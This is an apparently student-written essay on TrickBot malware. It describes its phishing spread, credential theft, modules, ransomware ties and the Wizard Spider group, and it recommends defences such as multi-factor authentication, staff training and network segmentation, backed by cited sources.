Cybersecurity in the Real World

The world has begun entering its technologically advanced age, where many of its
different countries and people are essentially completely reliant on their devices. Some examples
being the invention and development of artificial intelligence, the exposure of the people to
media like Tiktok, X, Instagram, and Snapchat, companies moving their information from paper
to digital, and even just access to the internet. Because of this, cybersecurity is more important
than ever. Especially since everyone wants their information to remain private.
Of course even with cybersecurity, there are always risks of breaches or exposures. These
risks include anything that can affect the confidentiality, integrity, and availability of your data
like malware, social engineering, denial-of-service attacks, ransomware, phishing, and zero day
exploits. While some of these categories are specific, a lot of them include a lot of important and
dangerous threats.
Malware for example, includes viruses, worms, trojans, adware, and spyware all which
are typically used to access your system and either steal, encrypt, or damage your data. A
specific malware I would like to talk about is actually a trojan that was originally created to steal
financial information. It eventually turned into a “highly modular, multistage malware that
provides its operators a full suite of tools to conduct a myriad of illegal cyber activity” according
to the Cybersecurity & Infrastructure Security Agency (CISA 2021). This trojan was called
TrickBot and it was first discovered back in 2016.
Because TrickBot is a trojan, it gains access to people’s networks by spear-phishing,
using emails with it in them or when someone downloads an attachment or clicks on a link that is
already infected with it. The problem with this malware is that while it spreads through your system and network it can alter your data by encrypting it, stealing it, and even deleting it.
(Baker 2023).

TrickBot Malware

Throughout the time that TrickBot was active it affected millions of people around the
world. Not only did it affect people but it also affected hospitals, schools, and businesses all
over. In the U.S alone it affected people within 47 of its 50 states and a Russian cybercrime
organization, supposedly called Wizard Spider, has been charged with initiating many of these
attacks (Office of Public Affairs 2023). According to Wallarm, the losses in money across the
different countries surpassed the millions. With North America topping it with over 1 billion
dollars lost (Ilyin 2025).
One TrickBot attack actually happened in 2020 during one of the peaks of COVID and
included 3 hospitals where the computers and devices all went down because they were targeted
by one of the Russian malware gangs, Wizard Spider. Their goal was to get busy hospitals during
COVID issues and that to get their systems back up they would pay a ransom but after the arrests
of some of the members of Wizard Spider, the attacks died down (Burgess 2022).
The trojan, once it is into your system, can check every website entered. Once you enter
the site for a targeted website, in this case any bank website or website related to financial data, it
will essentially be able to get the information of any logins you do or any bank information that
pops up when you are on the website. According to Wallarm, “This stolen information can
subsequently be auctioned on the darknet or used for future malicious endeavors” (Ilyin 2025).
The Total Fraud Protection channel on YouTube actually has a video detailing how TrickBot
works and even shows that with the targeted websites it can still have the https and a valid security certificate but the code for the website is longer and states that it is copying the
credentials from the website (2017).
Not only can TrickBot do that but according to Crowdstrike it has the ability to install
backdoors in your network and system so it can continuously access it, as well as disable any
antivirus tools you may have installed and it adapts so it is often hard to trace or even know your
system is infected with it. TrickBot can also communicate with the command and control server
(C2) which allows it to create bots that can be scattered around your systems. Because it is a
trojan with multiple modules, each of them have different tasks and abilities. The CoredII
module is one of the main ones and is used for packing and encrypting information and data.
InjectDII is a module that is used for watching your activity on financial websites and stealing
the information. TabDII is a module used for EternalRomance exploits to spread the malware
further (CIS Blog 2021). Since TrickBot can get rid of a lot of antivirus software, it is actually
known for being able to disable Windows Defender. On top of that it can also install and
download other types of malware onto your device and have it attack your system or demand
ransom like the ransomware Wizard Spider calls Ryuk and Conti (Baker 2023).

Defense and Mitigation

Because TrickBot became so adaptive it is very difficult to realize your network is
infected. The best way to protect yourself and your devices from TrickBot is to limit the access
to the network so there is a less likely chance of it getting affected. Having access to multi-factor
authentication helps with only giving the right people access too. Training associates at your
company is also a good way to prevent the systems from getting affected because then they will
know when sites or attachments look suspicious and if they do get infected they will know what
to look for and be able to quickly report it. To help prevent social engineering attempts within companies you can mark outside emails as external so your associates are extra cautious. If you
do have systems that are infected, separating them from the other networks will help keep the
malware from spreading as well (Baker 2023). According to Wallarm, companies like Symantec,
McAfee, and Kaspersky have designed antivirus software that can be used to find and get rid of a
TrickBot and overall companies around the world have started to decrease the amount of
vulnerabilities their systems may have to keep TrickBot from being able to breach them (Ilyin
2025).
According to the CISA, they developed a method of detecting TrickBot signatures in
network activity, which makes sense given that in the Total Fraud Protection video they show
that the codes for the websites say what they are for and are noticeably different from the
original website. The video also mentions that client lists should be helpful for determining if
there are any malicious code injections in the sites you may enter (Office of Public Affairs 2023
& 2017).
Although TrickBot started in 2016 according to my research, a lot of the attacks
happened during the COVID years because with all the stress around the world it was easier to
target vulnerable places like the hospitals mentioned earlier. But now, in 2025 TrickBot is still
around and still continuously evolving, becoming better and smarter. So our methods of
detecting it need to evolve and become stronger too.
The problem with today’s society is that due to the fact that the world has been managed
by what is going on in the media, I think more people would fall for the social engineering aspect
of the TrickBot malware. So, fake emails from companies advertising popular products could
have someone unknowingly fall for it and click on a link or infected attachment. Because of this,
I believe it is essential for these social media companies to educate their users about these possible threats to their safety and security so they are alert when it comes to these threats.
Although there still aren’t very many ways to detect TrickBot infections, the methods of trying to
prevent it have grown as what TrickBot can do changes. So, make sure you look out for
manipulative or fake emails, infected web browsers, and phishing traps.

References

Baker, Kurt. “What Is TrickBot Malware?” CrowdStrike, 2 Oct. 2023,
www.crowdstrike.com/en-us/cybersecurity-101/malware/trickbots/.
“Blog: TrickBot: Not Your Average Hat Trick – a Malware with Multiple Hats.” CIS, Center for
Internet Security, 22 Apr. 2021, www.cisecurity.org/insights/blog/trickbot-not-
your-average-hat-trick-a-malware-with-multiple-hats.
Burgess, Matt. “Inside Trickbot, Russia’s Notorious Ransomware Gang.” Wired, Conde Nast, 1
Feb. 2022, www.wired.com/story/trickbot-malware-group-internal-messages/.
Fraud Protection, Total. “How Trickbot Works.” YouTube, YouTube, 19 Sept. 2017,
www.youtube.com/watch?v=2MUKoNcGo-8.
Ilyin, Stepan. “Deciphering TrickBot: How It Works and How to Mitigate It.” RSS, Wallarm, 5
Apr. 2025, www.wallarm.com/what/trickbot-
malware#:~:text=Investigating%20the%20Future:%20TrickBot%27s%20Potentia
l,for%20the%20infamous%20malware%2C%20TrickBot.&text=The%20emergen
ce%20of%20TrickBot%20was,upon%20modern%20malware%20enhancement%
20tendencies.
“Multiple Foreign Nationals Charged in Connection with Trickbot Malware and Conti
Ransomware Conspiracies.” Office of Public Affairs | Multiple Foreign Nationals
Charged in Connection with Trickbot Malware and Conti Ransomware
Conspiracies | United States Department of Justice, 7 Sept. 2023. Updated 6 Feb.
2025, www.justice.gov/archives/opa/pr/multiple-foreign-nationals-charged-
connection-trickbot-malware-and-contiransomware#:~:text=According%20to%20court%20documents%20and,Attorney
%20General%20Merrick%20B.%20Garland.
“TrickBot Malware: CISA.” Cybersecurity and Infrastructure Security Agency CISA, 21 May
2021, www.cisa.gov/news-events/cybersecurity-advisories/aa21-076a.